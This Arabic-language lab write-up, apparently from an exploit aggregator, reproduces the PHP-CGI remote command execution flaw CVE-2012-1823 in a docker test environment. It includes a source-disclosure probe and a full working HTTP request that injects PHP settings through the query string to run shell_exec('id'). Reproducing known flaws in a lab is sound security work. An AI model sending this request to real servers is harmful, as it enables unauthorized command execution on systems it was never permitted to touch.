## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CYBERHARSH-PHP_CVE-2012-1823
# ثغرة تنفيذ الأوامر عن بُعد في PHP-CGI (CVE-2012-1823)
## المبدأ
* مقالة مرجعية: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
* الإصدارات المتأثرة: php < 5.3.12 أو php < 5.4.2
## بيئة الاختبار
بناء وتشغيل البيئة:
root@kitploit:~
docker-compose build
docker-compose up -d
بعد تشغيل البيئة، قم بزيارة `http://your-ip:8080/` لرؤية نص "Hello".
عند زيارة `http://your-ip:8080/index.php?-s` سيتم عرض شفرة المصدر، مما يدل على وجود الثغرة. أرسل حزمة البيانات التالية، ستلاحظ تنفيذ الكود الموجود في الجسم:
root@kitploit:~
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
<?php echo shell_exec("id"); ?>